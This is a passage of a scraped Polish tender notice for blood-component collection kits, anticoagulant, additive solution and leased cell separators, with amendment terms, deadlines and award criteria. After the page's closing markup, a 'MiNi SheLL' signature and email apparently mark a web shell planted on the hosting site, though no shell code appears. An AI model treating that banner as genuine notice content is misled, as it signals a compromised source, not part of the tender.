nazwy). 5. Dopuszczalna jest zmiana umowy polegająca na zmianie płatnika faktur. 6. Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości zestawów niż określona w ofercie, jednocześnie wskazuje, że ostateczna ilość zamówionego towaru nie może być mniejsza niż 70% wartości wskazanej w opisie przedmiotu zamówienia. Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia zamówienia w powyżej wskazanym zakresie. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie zmniejszenia ilości dostaw. 2. w przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 1 termin dostawy może ulec odpowiedniemu przedłużeniu o czas niezbędny do należytego jej wykonania, nie dłużej jednak niż o okres tych okoliczności. 3. zmiany wynagrodzenia Wykonawcy: a. zmiany polegające na obniżeniu wynagrodzenia Wykonawcy przy zachowaniu zakresu jego świadczenia umownego, b. zmiany spowodowane udzieleniem przez Wykonawcę upustów promocyjnych - w przypadku udzielenia przez Wykonawcę upustów promocyjnych dla klienta w okresie trwania umowy, upusty będą obowiązywały również dla tej umowy, c. zmiany spowodowane wzrostem albo zmniejszeniem stawki VAT - jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia Wykonawcy o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę; jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT zapłaconego przez Wykonawcę. 4. dopuszczalna jest zmiana sposobu spełnienia świadczenia polegająca na zmianie świadczenia Wykonawcy na lepszej jakości przy zachowaniu tożsamości przedmiotu świadczenia. 5. dopuszczalna jest zmiana umowy polegająca na zmianie płatnika faktur.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-07-24</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Oferta powinna być sporządzona w języku polskim. Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski </span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>1. DOSTAWA JEDNORAZOWYCH ZESTAWÓW PRZEZNACZONY DO AUTOMATYCZNEGO POBIERANIA SKŁADNIKÓW KRWI: KRWINEK PŁYTKOWYCH W ROZTWORZE WZBOGACAJĄCYM, OSOCZA I/LUB KRWINEK CZERWONYCH PRZY POMOCY SEPARATORA TRIMA ACCEL. ZESTAW KOMPATYBILNY Z SEPARATORAMI KOMÓRKOWYMI TRIMA ACCEL BĘDĄCYCH WŁASNOŚCIĄ RCKiK W RADOMIU - 300 SZ2. ANTYKOAGULANT DO POBIERANIA KONCENTRATU KRWINEK PŁYTKOWYCH METODĄ AUTOMATYCZNĄ - ACDA - 300 SZTUKTUK, </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>PAKIET I - REALIZACJA 12 MIESIĘCY1. DOSTAWA JEDNORAZOWYCH ZESTAWÓW PRZEZNACZONY DO AUTOMATYCZNEGO POBIERANIA SKŁADNIKÓW KRWI: KRWINEK PŁYTKOWYCH W ROZTWORZE WZBOGACAJĄCYM, OSOCZA I/LUB KRWINEK CZERWONYCH PRZY POMOCY SEPARATORA TRIMA ACCEL.ZESTAW KOMPATYBILNY Z SEPARATORAMI KOMÓRKOWYMI TRIMA ACCEL BĘDĄCYCH WŁASNOŚCIĄ RCKiK W RADOMIU - 300 SZTUK1. Zestawy jednorazowego użytku funkcjonalnie zamknięte.2. Zestaw wyposażony w igłę poddaną obróbce zwiększającej poślizg .3. Wyposażony w pojemnik próbkowy oraz adapter do pobrania pierwszej porcji krwi przed donacją.4. Zestaw wyposażony w porty do jałowego przyłączenia płynów - antykoagulantu, roztworu wzbogacającego.5. Wyposażony w płytkowe pojemniki wykonane z tworzywa umożliwiającego przechowywanie uzyskanego w wyniku separacji UKKP-Af./RW przez okres co najmniej 5 dni. Pojemnik powinien zawierać port zabezpieczony błoną od wewnątrz oraz ochronę z zewnątrz, gwarantujące jałowość oraz zapewniające łatwy dostęp do podłączenia zestawu do przetoczenia. Centralnie na dolnej krawędzi pojemnika powinno znajdować się podłużne nacięcie materiału umożliwiające zawieszenie pojemnika na haczykach statywów transfuzyjnych. 6. Uzyskany składnik UKKP-Af./RW powinien zawierać powyżej 3 x 1011 krwinek płytkowych i poniżej 1 x 106 leukocytów w jednej jednostce składnika. Co najmniej 90% uzyskanych w wyniku separacji składników musi zawierać poniżej 1 x 106 leukocytów.7. Zestaw wyposażony w pojemnik do pobierania osocza wykonany z tworzywa umożliwiającego szokowe zamrażanie osocza w temperaturze -60°C i przechowywanie w temperaturze poniżej -25°C z zachowaniem jałowości pojemnika.8. Na pojemnikach do przechowywania UKKP-Af./RW i osocza muszą być trwale umocowane etykiety, które nie mogą ulec uszkodzeniu ani odklejeniu w czasie preparatyki i przechowywania. Etykiety muszą posiadać numer kodowy zestawu, numer serii zestawu w postaci cyfrowo-literowej i kodów kreskowych odpowiadających standardom ISBT 128 (EAN 128) oraz datę ważności zestawu. Rozmiary etykiet pozwalają na przyklejenie etykiet głównych zgodnych z wymaganiami ISBT.9. Etykieta opakowania jednostkowego zestawu powinna posiadać:a. nazwę i adres producentab. znak CEc. numer/nazwę zestawud. numer serii w postaci literowej lub literowo-cyfroweje. piktogramy daty ważności i datę ważności w postaci cyfrowejf. informację o numerze serii i dacie ważności w postaci kodu kreskowego zgodnego ze standardem EAN 128.10. Opakowanie zbiorcze odporne na uszkodzenia.11. Jedno opakowanie zbiorcze musi zawierać zestawy tylko jednej serii.12. Termin ważności zestawów - minimum 12 miesięcy od daty dostawy.13. Do każdej serii zestawów musi być dołączony certyfikat jakości zawierający numer kodowy REF, numer serii, datę ważności zestawów. Certyfikat musi posiadać zapis, iż pojemniki spełniają wymagania Farmakopei Europejskiej.2. ANTYKOAGULANT DO POBIERANIA KONCENTRATU KRWINEK PŁYTKOWYCH METODĄ AUTOMATYCZNĄ - ACDA - 300 SZTUK1. Objętość 500 ml2. Pirogenny, jałowy.3. Pojemnik opisany numerem kodowym REF, numerem serii i datą ważności, znakiem CE, składem roztworu antykoagulacyjnego.4. System podłączenia pojemnika z antykoagulantem kompatybilny z zestawem drenów do automatycznego pobierania składników krwi przy pomocy separatora komórkowego Trima.5. Do każdej serii dostarczony certyfikat jakości zawierający numer kodowy REF, numer serii, datę ważności, skład roztworu antykoagulacyjnego6. Pojedyncze pojemniki z antykoagulanem muszą być zapakowane w odporne na uszkodzenie opakowanie zbiorcze. Jedno opakowanie zbiorcze może zawierać zestawy tylko jednej serii. Opakowanie zbiorcze musi być opisane etykietą zawierającą: dane producenta, nazwę antykoagulantu, numer kodowy (REF), numer serii, datę ważności, informacje o warunkach przechowywania - magazynowania.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33140000-3, 33141300-3<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">GWARANCJA</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN DOSTAWY</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>1. ROZTWÓR WZBOGACAJĄCY DO POBIERANIA KONCENTRATU KRWINEK PŁYTKOWYCH W ROZTWORZE WZBOGACAJĄCYM METODĄ AUTOMATYCZNĄ, 500 ML - 612 SZTUK </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Objętość 500 ml2. Jałowy.3. Pojemnik opisany numerem kodowym REF, numerem serii i datą ważności, znakiem CE.4. Do każdej serii dostarczony certyfikat jakości zawierający numer kodowy REF, numer serii, datę ważności.6. Pojedyncze pojemniki z roztworem muszą być zapakowane w odporne na uszkodzenie opakowanie zbiorcze. Jedno opakowanie zbiorcze może zawierać zestawy tylko jednej serii. Opakowanie zbiorcze musi być opisane etykietą zawierającą: dane producenta, nazwę, numer kodowy (REF), numer serii, datę ważności, informacje o warunkach przechowywania - magazynowania.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33692500-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">GWARANCJA</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN DOSTAWY</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>1. DOSTAWA ZESTAWÓW DO AUTOMATYCZNEGO POBIERANIA UBOGOLEUKOCYTARNEGO KONCENTATU KRWINEK PŁYTKOWYCH / UBOGOLEUKOCYTARNEGO KONCENTATU KRWINEK PŁYTKOWYCH W ROZTWORZE WZBOGACAJĄCYM I OSOCZA - 900 SZTUK 2. DZIERŻAWA DWÓCH SEPARATORÓW KOMÓRKOWYCH NA OKRES 12 MIESIĘCY SŁUŻĄCYCH DO POBIERANIA UBOGOLEUKOCYTARNEGO KONCENTATU KRWINEK PŁYTKOWYCH / UBOGOLEUKOCYTARNEGO KONCENTATU KRWINEK PŁYTKOWYCH W ROZTWORZE WZBOGACAJĄCYM I OSOCZA KOMPATYBILNYCH DO ZAOFEROWANYCH ZESTAWÓW</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>PUNKT 1 - CHARAKTERYSTYKA1. Zestawy jednorazowego użytku funkcjonalnie zamknięte.2. Zestaw wyposażony w igłę poddaną obróbce zwiększającej poślizg. 3. Wyposażony w pojemnik próbkowy oraz adapter do pobrania pierwszej porcji krwi przed donacją.4. Jeden zestaw umożliwiający pobranie UKKP-Af. zawieszonego w osoczu lub roztworze wzbogacającym.5. Zestaw wyposażony w porty do jałowego przyłączenia płynów - antykoagulantu, roztworu wzbogacającego, ewentualnie fizjologicznego roztworu soli.6. Wyposażony w płytkowe pojemniki wykonane z tworzywa umożliwiającego przechowywanie uzyskiwanych w wyniku separacji UKKP-Af. / UKKP-Af./RW przez okres co najmniej 5 dni. Pojemnik powinien zawierać port zabezpieczony błoną od wewnątrz oraz ochronę z zewnątrz, gwarantujące jałowość oraz zapewniające łatwy dostęp do podłączenia zestawu do przetoczenia. Centralnie na dolnej krawędzi pojemnika powinno znajdować się podłużne nacięcie materiału umożliwiające zawieszenie pojemnika na haczykach statywów transfuzyjnych. 7. Uzyskany składnik UKKP-Af. / UKKP-Af./RW powinien zawierać powyżej 3 x 1011 krwinek płytkowych i poniżej 1 x 106 leukocytów w jednej jednostce składnika. Co najmniej 90 % uzyskanych w wyniku separacji składników musi zawierać poniżej 1 x 106 leukocytów.8. Zestaw wyposażony w pojemnik do pobierania osocza wykonany z tworzywa umożliwiającego szokowe zamrażanie osocza w temperaturze -60°C i przechowywanie w temperaturze poniżej -25°C z zachowaniem jałowości pojemnika.9. Na pojemnikach do przechowywania UKKP-Af. / UKKP-Af./RW, osocza muszą być trwale umocowane etykiety, które nie mogą ulec uszkodzeniu ani odklejeniu w czasie preparatyki i przechowywania. Etykiety muszą posiadać numer kodowy zestawu, numer serii zestawu w postaci literowo-cyfrowej i kodów kreskowych odpowiadających standardom ISBT 128 (EAN 128) oraz datę ważności zestawu. Rozmiary etykiet na pojemnikach powinien pozwolić na przyklejenie etykiet głównych zgodnych z wymaganiami ISBT.10. Etykieta opakowania jednostkowego zestawu powinna posiadać:a. nazwę i adres producentab. znak CEc. numer/nazwę zestawud. numer serii w postaci literowej lub literowo-cyfroweje. piktogram daty ważności i datę ważności w postaci cyfrowejf. informację o numerze serii i dacie ważności w postaci kodu kreskowego zgodnego ze standardem EAN 128.11. Opakowanie zbiorcze zestawów odporne na uszkodzenia.12. Jedno opakowanie zbiorcze musi zawierać zestawy tylko jednej serii.13. Termin ważności zestawów - minimum 12 miesięcy od daty dostawy.14. Do każdej serii zestawów musi być dołączony certyfikat jakości zawierający numer kodowy zestawu, numer serii, datę ważności. Certyfikat musi posiadać zapis, iż pojemniki spełniają wymagania Farmakopei Europejskiej.15. Zestawy muszą być kompatybilne z zaoferowanymi separatorami komórkowymi opisanymi poniżej.PUNKT 2 - CHARAKTERYSTYKA1. Separator komórkowy do zaoferowanych zestawów.2. Separator komórkowy fabrycznie nowy, nie starszy niż 2019 rok.3. Urządzenie będące wyrobem medycznym.4. Wyposażone w kółka dla łatwego transportu.5. Wyposażone w ruchomy wyświetlacz będący jednocześnie panelem dotykowym służącym do obsługi separatora.6. Wyposażone w czytnik kodów kreskowych umożliwiający skanowanie kodów w standardzie ISBT 128 (EAN 128).7. Separator wyposażony w automatyczny mankiet będący integralną częścią urządzenia.8. Zapewniające możliwość pobierania bez konieczności dodatkowej filtracji:a. Pojedynczego lub podwójnego UKKP-Af. zawieszonego w osoczub. Pojedynczego UKKP-Af. zawieszonego w osoczu, z możliwością pobierania dodatkowej jednostki osoczac. Pojedynczego UKKP-Af. zawieszonego w roztworze wzbogacającym z możliwością pobierania dodatkowej jednostki osocza.9. Uzyskany składnik UKKP powinien zawierać powyżej 3,0 x 1011 komórek płytkowych oraz poniżej 1,0 x 106 leukocytów w jednej jednostce składnika.10. Separator gwarantujący ciągły przepływ krwi zapewniający objętość pozaustrojową krwi dawcy w komorach separacyjnych i komorach zbiorczych zestawu (dreny, kasety, itp.) na maksymalnym poziomie 200 ? 10 ml.11. Oprogramowanie separatora oraz wszystkie wyświetlane komunikaty (informacje o błędach, podpowiedzi dla użytkownika) w języku polskim.12. System alarmowy informujący operatora o zaistniałym problemie wizualnie i akustycznie.13. Wizualna i akustyczna informacja o zakończonym procesie pobierania.14. Możliwość kontynuowania separacji w przypadku chwilowego braku zasilania (pamięć wewnętrzna aktualnego stanu separacji).15. Podwójny system monitorowania antykoagulantu (pompa + waga lub pompa + czujnik).16. Możliwość zmiany parametrów pobierania przed i w trakcie separacji pod kątem specyficznych potrzeb dawcy.17. Separator wyposażony w mankiet będący integralną częścią urządzenia, automatycznie pompowany i zwalniany podczas procedury pobierania.18. Bezprzewodowa transmisja danych z urządzenia do programu rejestrującego zainstalowanego na laptopie i dalej do systemu ,,Bank Krwi" (numer donacji, data i godzina pobrania, numer separatora, ilość pobranych składników krwi, objętość preparatu, kod operatora, kod LOT zestawu). Koszt podłączenia po stronie Wykonawcy.19. Przegląd techniczny według zaleceń producenta, nie rzadziej niż co 12 miesięcy, bezpłatny w ramach umowy dżierżawy.20. Bezpłatna instalacja, uruchomienie oraz przeszkolenie pracowników w zakresie obsługi urządzenia.21. Kwalifikacja instalacyjna i operacyjna urządzenia przez serwis.22. Wykonawca zapewni bezpłatny serwis (robocizna, koszt wymienianych części/podzespołów, koszty zużytych materiałów eksploatacyjnych, dojazd, koszty delegacji) w okresie trwania umowy dzierżawy (od daty podpisania protokołu odbioru w siedzibie Zamawiającego). <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33141000-0, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">JAKOŚĆ</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com